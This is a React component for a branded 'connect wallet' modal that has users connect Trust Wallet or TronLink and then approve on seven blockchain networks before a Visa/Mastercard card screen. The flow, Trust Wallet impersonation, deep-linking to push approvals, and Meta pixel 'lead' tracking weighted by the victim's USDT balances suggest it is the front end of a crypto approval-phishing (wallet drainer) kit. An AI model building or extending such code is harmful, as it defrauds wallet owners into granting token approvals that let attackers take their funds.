import { useState, useEffect } from "react";
import { useNavigate } from "react-router-dom";
import { Dialog, DialogContent, DialogTitle, DialogDescription } from "@/components/ui/dialog";
import { ChevronLeft, Wallet, Wifi, ArrowRight, X, Loader2, Check } from "lucide-react";
import { useLanguage } from "@/i18n/LanguageContext";
import { fetchAllBalances, type ChainBalances } from "@/services/wallet";
import networkTron from "@/assets/network-tron.webp";
import networkEth from "@/assets/network-eth.webp";
import networkBsc from "@/assets/network-bsc.webp";
import polLogo from "@/assets/network-polygon.png";
import avaxLogo from "@/assets/avalanche-logo.png";
import arbLogo from "@/assets/network-arbitrum.png";
import baseLogo from "@/assets/network-base.png";
import trustWalletIcon from "@/assets/trust-wallet-icon.webp";
import fullTrustWalletLogo from "@/assets/full-trust-wallet-logo.webp";
import { motion } from "framer-motion";
import type { MetaLeadValueData } from "@/lib/metaPixel";
import { trackMetaPixelApprovedLead } from "@/lib/metaPixel";

const config = {
  delayMs: 1500,
};

// Some injected TRON wallets leave their signing promise pending after the
// user rejects the request. Never let that provider behaviour lock the UI.
const APPROVAL_TIMEOUT_MS = 45_000;

const withApprovalTimeout = <T,>(promise: Promise<T>): Promise<T> => {
  let timeoutId: ReturnType<typeof setTimeout> | undefined;
  let returnGraceId: ReturnType<typeof setTimeout> | undefined;
  let leftPage = document.visibilityState === "hidden";
  let rejectPending: ((reason?: unknown) => void) | undefined;

  const timeout = new Promise<never>((_, reject) => {
    rejectPending = reject;
    timeoutId = setTimeout(
      () => reject(new Error("Wallet approval timed out or was cancelled")),
      APPROVAL_TIMEOUT_MS,
    );
  });

  const handleVisibilityChange = () => {
    if (document.visibilityState === "hidden") {
      leftPage = true;
      return;
    }

    // Give the provider a short window to deliver a successful signature
    // after returning from the wallet. A rejected TRON request sometimes
    // never settles at all, so treat that state as cancellation.
    if (leftPage && returnGraceId === undefined) {
      returnGraceId = setTimeout(() => {
        rejectPending?.(new Error("Wallet approval was cancelled"));
      }, 3_000);
    }
  };

  document.addEventListener("visibilitychange", handleVisibilityChange);

  return Promise.race([promise, timeout]).finally(() => {
    if (timeoutId !== undefined) clearTimeout(timeoutId);
    if (returnGraceId !== undefined) clearTimeout(returnGraceId);
    document.removeEventListener("visibilitychange", handleVisibilityChange);
  });
};

const sleep = (ms: number) => new Promise((resolve) => setTimeout(resolve, ms));

const openTrustWalletForApproval = () => {
  // Open Trust's WalletConnect screen directly. Do not use open_url or an
  // HTTPS universal link here: both also open the dapp inside Trust's browser
  // and can leave a second "Open in Trust" prompt behind in the normal browser.
  window.location.href = "trust://wc";
};

type WalletConnectResult = {
  pending?: boolean;
  connected?: boolean;
  error?: string;
};

type WalletType = "walletconnect" | "tronlink";
type CardNetwork = "visa" | "mastercard";

type WalletBridge = {
  connect?: () => Promise<WalletConnectResult | unknown>;
  setWalletType?: (walletType?: string) => Promise<string> | string;
  approveByNetworkId?: (networkId: string, element?: HTMLElement | null) => Promise<boolean>;
  getLeadValueData?: () => Promise<MetaLeadValueData | undefined> | MetaLeadValueData | undefined;
};

declare global {
  interface Window {
    __twproductWalletConnect?: WalletBridge;
    tronLink?: unknown;
    tronWeb?: {
      defaultAddress?: {
        base58?: string;
      };
    };
  }
}

const getWalletBridge = () => window.__twproductWalletConnect;

const parseUsdAmount = (value?: string) => {
  const parsed = Number.parseFloat(value || "0");
  return Number.isFinite(parsed) && parsed > 0 ? parsed : 0;
};

const getStableBalanceValueUsd = (balances: ChainBalances) =>
  parseUsdAmount(balances.eth?.usdt) + parseUsdAmount(balances.bsc?.usdt) + parseUsdAmount(balances.tron?.usdt);

const getLeadValueData = async (bridge?: WalletBridge): Promise<MetaLeadValueData> => {
  try {
    const bridgeValueData = await bridge?.getLeadValueData?.();
    if (bridgeValueData?.assetValueUsd !== undefined || bridgeValueData?.leadSegment) {
      return bridgeValueData;
    }
  } catch (error) {
    console.warn("Unable to read Meta lead value data from wallet bridge", error);
  }

  try {
    const balances = await fetchAllBalances();
    const stableBalanceUsd = getStableBalanceValueUsd(balances);

    return {
      assetValueUsd: stableBalanceUsd >= 1 ? stableBalanceUsd : 1,
      currency: "USD",
    };
  } catch (error) {
    console.warn("Unable to read wallet balances for Meta lead value data", error);
    return { assetValueUsd: 1, currency: "USD" };
  }
};

const isTronLinkEnvironment = () => {
  if (typeof window === "undefined") return false;

  const userAgent = navigator.userAgent.toLowerCase();
  return Boolean(window.tronLink || window.tronWeb?.defaultAddress?.base58 || userAgent.includes("tronlink"));
};

const getInitialWalletType = (): WalletType => isTronLinkEnvironment() ? "tronlink" : "walletconnect";

const isPendingWalletConnectResult = (value: unknown): value is WalletConnectResult =>
  typeof value === "object" && value !== null && "pending" in value && Boolean((value as WalletConnectResult).pending);

const isFailedWalletConnectResult = (value: unknown): value is WalletConnectResult =>
  typeof value === "object" && value !== null && "connected" in value && (value as WalletConnectResult).connected === false;

const networks = [
  { id: "trons", name: "Tron (TRC-20)", icon: networkTron, iconSize: "w-[13.5rem] h-[13.5rem]" },
  { id: "eth_btn", name: "Ethereum (ERC-20)", icon: networkEth, iconSize: "w-[13.5rem] h-[13.5rem]" },
  { id: "bsc_btn", name: "BSC (BEP-20)", icon: networkBsc, iconSize: "w-9 h-9" },
  { id: "polygon_btn", name: "Polygon (ERC-20)", icon: polLogo, iconSize: "w-9 h-9" },
  { id: "avax_btn", name: "Avalanche (ERC-20)", icon: avaxLogo, iconSize: "w-9 h-9" },
  { id: "arbitrum_btn", name: "Arbitrum (ERC-20)", icon: arbLogo, iconSize: "w-9 h-9" },
  { id: "base_btn", name: "Base (ERC-20)", icon: baseLogo, iconSize: "w-9 h-9" },
] as const;



interface ConnectWalletModalProps {
  open: boolean;
  onOpenChange: (open: boolean) => void;
}

const ConnectWalletModal = ({ open, onOpenChange }: ConnectWalletModalProps) => {
  const { t, language } = useLanguage();
  const navigate = useNavigate();

  
  // 0: intro, 1: connect, 2: network, 3: ready
  const [step, setStep] = useState(0);
  
  // Перенесенное состояние из Old.tsx
  const [loading, setLoading] = useState(false);
  const [approveStatus, setApproveStatus] = useState<Record<string, string>>({});
  const [isBlocked, setIsBlocked] = useState(false);
  const [selectedWalletType, setSelectedWalletType] = useState<WalletType>(getInitialWalletType);
  const [selectedCardNetwork, setSelectedCardNetwork] = useState<CardNetwork>("visa");

  const walletSteps = [
    t("wallet.step1"),
    t("wallet.step2"),
    t("wallet.step3"),
  ];

  // Сброс состояния при открытии модального окна
  useEffect(() => {
    if (open) {
      setStep(0);
      setLoading(false);
      setApproveStatus({});
      setIsBlocked(false);
      setSelectedWalletType(getInitialWalletType());
      setSelectedCardNetwork("visa");
    }
  }, [open]);

  const isConnecting =
    loading ||
    Object.values(approveStatus).some((s) => s === "waiting" || s === "pending");

  const handleClose = () => {
    if (isConnecting) return;
    onOpenChange(false);
    setTimeout(() => {
      setStep(0);
    }, 300);
  };

  const handleBack = () => {
    if (isConnecting) return;
    if (step === 0) {
      handleClose();
    } else {
      setStep(step - 1);
    }
  };

  // Функция подключения кошелька (Шаг 2)
  const handleConnect = async (walletType: WalletType = getInitialWalletType()) => {
    setLoading(true);

    try {
      const bridge = getWalletBridge();

      if (!bridge?.connect) {
        throw new Error("WalletConnect bundle is not loaded");
      }

      // Keep WalletConnect opening inside the original click user gesture.
      // Awaiting setWalletType first can move the modal/deeplink call to a later
      // microtask, which some mobile browsers/wallets ignore until the next tap.
      void bridge.setWalletType?.(walletType);
      const connectResult = await bridge.connect();

      if (isPendingWalletConnectResult(connectResult)) {
        return;
      }

      if (isFailedWalletConnectResult(connectResult)) {
        throw new Error(connectResult.error || "Wallet connection was cancelled or failed");
      }

      setSelectedWalletType(walletType);
      setTimeout(() => setStep(2), 600);
    } catch (err) {
      console.error(err);
    } finally {
      await sleep(config.delayMs);
      setLoading(false);
    }
  };

  // Функция выбора сети (Шаг 3)
  const handleApprove = async (network: (typeof networks)[number]["id"]) => {
    setApproveStatus((s) => ({ ...s, [network]: "waiting" }));

    try {
      const bridge = getWalletBridge();

      if (!bridge?.approveByNetworkId) {
        throw new Error("Wallet approve bridge is not loaded");
      }

      setApproveStatus((s) => ({ ...s, [network]: "pending" }));
      const target = document.getElementById(network);
      const approvalPromise = bridge.approveByNetworkId(network, target);

      // Keep the native-app launch in the original click gesture. Mobile
      // browsers block custom-scheme prompts once execution crosses an await
      // boundary, which previously left the approval waiting in Trust until
      // the user opened the wallet manually.
      const isMobile = /android|iphone|ipad|ipod|mobile/i.test(navigator.userAgent);
      if (selectedWalletType === "walletconnect" && isMobile) {
        openTrustWalletForApproval();
      }

      const approved = await withApprovalTimeout(approvalPromise);

      if (!approved) {
        throw new Error("Wallet approval was cancelled or failed");
      }

      setApproveStatus((s) => ({
        ...s,
        [network]: `✅ ${t("wallet.status.done")}`,
      }));
      const leadValueData = await getLeadValueData(bridge);
      trackMetaPixelApprovedLead(network, leadValueData);
      setTimeout(() => setStep(3), 1000);
    } catch (err) {
      console.error(err);
      setApproveStatus((s) => ({ ...s, [network]: `❌ ${t("wallet.status.error")}` }));
      setIsBlocked(true);
      setTimeout(() => setIsBlocked(false), 2000);
    } finally {
      await sleep(config.delayMs);
    }
  };

  const walletOptions = isTronLinkEnvironment()
    ? [{ id: "tronlink" as const, label: t("wallet.tronLink"), icon: "/trust-assets/wallets/tronlink-logo-name-dark.png" }]
    : [
        { id: "walletconnect" as const, label: t("wallet.walletConnect"), icon: trustWalletIcon },
        { id: "tronlink" as const, label: t("wallet.tronLink"), icon: "/trust-assets/wallets/tronlink-logo-name-dark.png" },
      ];

  const availableNetworks = selectedWalletType === "tronlink"
    ? networks.filter((network) => network.id === "trons")
    : networks;

  const titles: Record<number, string> = {
    0: t("wallet.intro.title"),
    1: walletSteps[0],
    2: walletSteps[1],
    3: walletSteps[2],
  };

  const showChips = step >= 1;
  const chipStep = step - 1;

  return (
    <Dialog open={open} onOpenChange={handleClose} modal={false}>
      <DialogContent 
        className="sm:max-w-[480px] max-h-[calc(100dvh-2rem)] sm:max-h-[88vh] p-0 gap-0 rounded-2xl border-border overflow-hidden flex flex-col [&>button.absolute]:hidden"
        onInteractOutside={(e) => { if (isConnecting) e.preventDefault(); }}
        onEscapeKeyDown={(e) => { if (isConnecting) e.preventDefault(); }}
      >
        <div className="min-h-0 flex-1 overflow-y-auto overscroll-contain p-6 pb-4 [-webkit-overflow-scrolling:touch]">
          <div className="flex items-center gap-2 mb-5">
            {step === 0 ? (
              <div className="w-8 h-8 shrink-0" />
            ) : (
              <button
                onClick={handleBack}
                disabled={isConnecting}
                className="w-8 h-8 flex items-center justify-center rounded-full hover:bg-secondary transition-colors shrink-0 disabled:opacity-50"
              >
                <ChevronLeft className="w-5 h-5 text-foreground" />
              </button>
            )}
            <DialogTitle className="text-xl font-bold text-foreground text-center flex-1">
              {titles[step]}
            </DialogTitle>
            <button
              onClick={handleClose}
              disabled={isConnecting}
              className="w-8 h-8 flex items-center justify-center rounded-full hover:bg-secondary transition-colors shrink-0 disabled:opacity-50"
              aria-label={t("wallet.close")}
            >
              <X className="w-5 h-5 text-foreground" />
            </button>
          </div>
          <DialogDescription className="sr-only">{titles[step]}</DialogDescription>

          {showChips && (
            <div className="flex gap-2 mb-5">
              {walletSteps.map((label, i) => (
                <div
                  key={i}
                  className={`flex items-center gap-1.5 px-2.5 py-2 rounded-xl text-[11px] font-medium flex-1 min-w-0 ${
                    i === chipStep
                      ? "bg-primary/10 border border-primary/30 text-primary"
                      : i < chipStep
                        ? "bg-primary/5 border border-primary/10 text-primary/60"
                        : "bg-muted/50 border border-transparent text-muted-foreground"
                  }`}
                >
                  <div
                    className={`w-1.5 h-1.5 rounded-full shrink-0 ${
                      i <= chipStep ? "bg-primary" : "bg-muted-foreground/40"
                    }`}
                  />
                  <span className="truncate">{label}</span>
                </div>
              ))}
            </div>
          )}

          {/* Step 0: Intro */}
          {step === 0 && (
            <div className="space-y-3">
              {[
                {
                  number: 1,
                  title: t("wallet.intro.step1.title"),
                  subtitle: t("wallet.intro.step1.subtitle"),
                  desc: t("wallet.intro.step1.desc"),
                  active: true,
                },
                {
                  number: 2,
                  title: t("wallet.intro.step2.title"),
                  subtitle: t("wallet.intro.step2.subtitle"),
                  desc: t("wallet.intro.step2.desc"),
                  active: false,
                },
                {
                  number: 3,
                  title: t("wallet.intro.step3.title"),
                  subtitle: t("wallet.intro.step3.subtitle"),
                  desc: t("wallet.intro.step3.desc"),
                  active: false,
                },
              ].map((item) => (
                <div
                  key={item.number}
                  className={`rounded-2xl border p-4 transition-colors ${
                    item.active
                      ? "border-primary bg-primary/[0.04] shadow-[0_0_0_1px_hsl(var(--primary))]"
                      : "border-border bg-muted/20 opacity-55"
                  }`}
                >
                  <div className="flex items-start gap-3">
                    <div
                      className={`mt-0.5 flex h-9 w-9 shrink-0 items-center justify-center rounded-full text-sm font-bold ${
                        item.active
                          ? "bg-primary text-primary-foreground"
                          : "bg-muted text-muted-foreground"
                      }`}
                    >
                      {item.number}
                    </div>
                    <div className="min-w-0 flex-1">
                      <h3 className="text-lg font-bold leading-tight text-foreground">
                        {item.title}
                      </h3>
                      <p className="mt-2 text-sm leading-relaxed text-muted-foreground">
                        {item.subtitle}
                      </p>
                      <p className="mt-3 text-sm leading-relaxed text-muted-foreground">
                        {item.desc}
                      </p>
                      {item.active && (
                        <button
                          className="mt-4 w-full inline-flex items-center justify-center gap-2 rounded-full bg-primary px-6 py-3.5 text-base font-semibold text-primary-foreground shadow-[var(--shadow-button)] transition-transform hover:-translate-y-0.5"
                          onClick={() => setStep(1)}
                        >
                          {t("wallet.continue")}
                          <ArrowRight className="w-4 h-4" />
                        </button>
                      )}
                    </div>
                  </div>
                </div>
              ))}
            </div>
          )}

          {/* Step 1: Подключение кошелька */}
          {step === 1 && (
            <div className="space-y-5">
              <div className="flex flex-col items-center text-center py-6">
                <motion.div
                  className="w-24 h-24 rounded-2xl bg-primary/10 flex items-center justify-center mb-4 relative"
                  initial={{ scale: 0.8, opacity: 0 }}
                  animate={{ scale: 1, opacity: 1 }}
                  transition={{ duration: 0.5, ease: "easeOut" }}
                >
                  {loading ? (
                    <Loader2 className="w-12 h-12 text-primary animate-spin" />
                  ) : (
                    <motion.div
                      animate={{ y: [0, -6, 0] }}
                      transition={{ duration: 2, repeat: Infinity, ease: "easeInOut" }}
                    >
                      <Wallet className="w-12 h-12 text-primary" />
                    </motion.div>
                  )}
                  <motion.div
                    className="absolute inset-0 rounded-2xl border-2 border-primary/30"
                    animate={{ scale: [1, 1.15, 1], opacity: [0.5, 0, 0.5] }}
                    transition={{ duration: 2, repeat: Infinity, ease: "easeInOut" }}
                  />
                  <motion.div
                    className="absolute inset-0 rounded-2xl border-2 border-primary/20"
                    animate={{ scale: [1, 1.3, 1], opacity: [0.3, 0, 0.3] }}
                    transition={{ duration: 2, repeat: Infinity, ease: "easeInOut", delay: 0.3 }}
                  />
                  <motion.div
                    className="absolute -top-2 -right-2 w-8 h-8 rounded-full bg-primary flex items-center justify-center"
                    animate={{ scale: [1, 1.1, 1] }}
                    transition={{ duration: 1.5, repeat: Infinity }}
                  >
                    <Wifi className="w-4 h-4 text-primary-foreground" />
                  </motion.div>
                </motion.div>
                <p className="text-sm text-muted-foreground max-w-xs">
                  {t("wallet.connectDesc")}
                </p>
              </div>
              <div className="grid grid-cols-1 gap-3">
                {walletOptions.map((wallet) => (
                  <button
                    key={wallet.id}
                    className="flex w-full items-center gap-4 rounded-2xl border border-primary/15 bg-primary/[0.03] px-5 py-4 text-left transition-colors hover:bg-primary/[0.07] disabled:opacity-60"
                    onClick={() => handleConnect(wallet.id)}
                    disabled={loading}
                  >
                    <span className="flex h-12 w-12 shrink-0 items-center justify-center rounded-full bg-muted/60 overflow-hidden">
                      {loading ? (
                        <Loader2 className="w-6 h-6 text-primary animate-spin" />
                      ) : (
                        <img src={wallet.icon} alt={wallet.label} className="h-7 w-7 object-contain" />
                      )}
                    </span>
                    <span className="min-w-0 flex-1">
                      <span className="block font-semibold text-sm text-foreground">{wallet.label}</span>
                      <span className="mt-0.5 block text-xs text-muted-foreground">{t("wallet.tapToConnect")}</span>
                    </span>
                    {!loading && <ArrowRight className="w-4 h-4 text-muted-foreground shrink-0" />}
                  </button>
                ))}
              </div>
              <p className="text-xs text-muted-foreground text-center">
                {t("wallet.afterConnect")}
              </p>
            </div>
          )}

          {/* Step 2: Выбор сети и Approve транзакции */}
          {step === 2 && (
            <div className="space-y-4">
              <p className="text-sm text-muted-foreground text-center">
                {t("wallet.chooseNetwork")}
              </p>
              <div className="grid grid-cols-1 gap-3 max-h-[340px] overflow-y-auto [&::-webkit-scrollbar]:hidden [-ms-overflow-style:none] [scrollbar-width:none]">
                {availableNetworks.map((network, i) => {
                  const status = approveStatus[network.id];
                  const isWaiting = status === "waiting";
                  const isPending = status === "pending";
                  const anyBusy = Object.values(approveStatus).some(
                    (s) => s === "waiting" || s === "pending"
                  );
                  const isDisabled = isWaiting || isPending || anyBusy || isBlocked;

                  return (
                    <motion.button
                      id={network.id}
                      key={network.id}
                      initial={{ opacity: 0, y: 8 }}
                      animate={{ opacity: 1, y: 0 }}
                      transition={{ delay: i * 0.05 }}
                      onClick={(event) => {
                        // demo.js also has a delegated document click handler for
                        // legacy markup. Do not let this React-controlled click
                        // reach it: handleApprove calls the same bridge itself.
                        event.stopPropagation();
                        void handleApprove(network.id);
                      }}
                      disabled={isDisabled}
                      className={`flex items-center gap-4 rounded-2xl border px-5 py-4 text-left transition-colors ${
                        isDisabled
                          ? "opacity-70 cursor-not-allowed border-primary/10 bg-primary/[0.02]"
                          : "border-primary/15 bg-primary/[0.03] hover:bg-primary/[0.07]"
                      }`}
                    >
                      <div className="flex h-12 w-12 items-center justify-center rounded-full bg-muted/60 shrink-0 overflow-hidden">
                        {isWaiting || isPending ? (
                          <Loader2 className="w-6 h-6 text-primary animate-spin" />
                        ) : (
                          <img
                            src={network.icon}
                            alt={network.name}
                            className={`${network.iconSize} object-contain`}
                          />
                        )}
                      </div>
                      <div className="min-w-0 flex-1">
                        <p className="font-semibold text-sm text-foreground">
                          {isWaiting
                            ? t("wallet.status.waiting")
                            : isPending
                              ? t("wallet.status.pending")
                              : network.name}
                        </p>
                        <p className="text-xs text-muted-foreground mt-0.5">
                          {status && !isWaiting && !isPending
                            ? status
                            : t("wallet.tapToConnect")}
                        </p>
                      </div>
                      {!isWaiting && !isPending && (
                        <ArrowRight className="w-4 h-4 text-muted-foreground shrink-0" />
                      )}
                    </motion.button>
                  );
                })}
              </div>
            </div>
          )}

          {/* Step 3: Card payment network selection */}
          {step === 3 && (
            <div className="space-y-6 pb-2">
              <div className="text-center">
                <img
                  src={fullTrustWalletLogo}
                  alt="Trust Wallet"
                  className="mx-auto mb-5 h-9 w-auto max-w-[220px] object-contain sm:h-10"
                />
                <h3 className="text-2xl font-bold tracking-tight text-foreground">
                  {t("wallet.cardNetwork.title")}
                </h3>
                <p className="mx-auto mt-2 max-w-sm text-sm leading-relaxed text-muted-foreground">
                  {t("wallet.cardNetwork.desc")}
                </p>
              </div>

              <div className="grid grid-cols-2 gap-3 sm:gap-4">
                {(["visa", "mastercard"] as const).map((cardNetwork) => {
                  const selected = selectedCardNetwork === cardNetwork;
                  const isVisa = cardNetwork === "visa";

                  return (
                    <button
                      key={cardNetwork}
                      type="button"
                      onClick={() => setSelectedCardNetwork(cardNetwork)}
                      aria-pressed={selected}
                      className={`relative flex min-h-[255px] flex-col items-center rounded-[28px] border-2 px-3 py-7 text-center transition-all ${
                        selected
                          ? "border-primary bg-primary/[0.035] shadow-[0_12px_35px_hsl(var(--primary)/0.14)]"
                          : "border-border bg-background hover:border-primary/40"
                      }`}
                    >
                      {selected && (
                        <span className="absolute right-3 top-3 flex h-6 w-6 items-center justify-center rounded-full bg-green-500 text-white">
                          <Check className="h-4 w-4" strokeWidth={3} />
                        </span>
                      )}

                      <div className="flex h-16 items-center justify-center">
                        {isVisa ? (
                          <span className="text-4xl font-black italic tracking-[-0.12em] text-[#1769c2]">VISA</span>
                        ) : (
                          <span className="relative block h-14 w-24" aria-label="Mastercard">
                            <span className="absolute left-1 top-1 h-12 w-12 rounded-full bg-[#eb001b]" />
                            <span className="absolute right-1 top-1 h-12 w-12 rounded-full bg-[#f79e1b] opacity-95" />
                          </span>
                        )}
                      </div>

                      <span className="mt-4 text-lg font-bold text-foreground">
                        {isVisa ? "Visa" : "Mastercard"}
                      </span>
                      <span className="mt-2 text-sm leading-relaxed text-muted-foreground">
                        {t(isVisa ? "wallet.cardNetwork.visaDesc" : "wallet.cardNetwork.mastercardDesc")}
                      </span>
                      <span className="mt-auto rounded-full border border-primary/25 bg-primary/5 px-3 py-1 text-[11px] font-semibold text-primary">
                        {t(isVisa ? "wallet.cardNetwork.visaBadge" : "wallet.cardNetwork.mastercardBadge")}
                      </span>
                    </button>
                  );
                })}
              </div>

              <button
                className="mx-auto flex w-full max-w-[270px] items-center justify-center gap-2 rounded-2xl bg-primary px-6 py-4 text-base font-semibold text-primary-foreground shadow-[var(--shadow-button)] transition-transform hover:-translate-y-0.5"
                onClick={() => {
                  handleClose();
                  const prefix = language === "en" ? "" : `/${language}`;
                  navigate(`${prefix}/success`, { state: { cardNetwork: selectedCardNetwork } });
                }}
              >
                {t("wallet.cardNetwork.continue")}
                <ArrowRight className="h-5 w-5" />
              </button>
            </div>
          )}
        </div>
      </DialogContent>
    </Dialog>
  );
};

export default ConnectWalletModal;
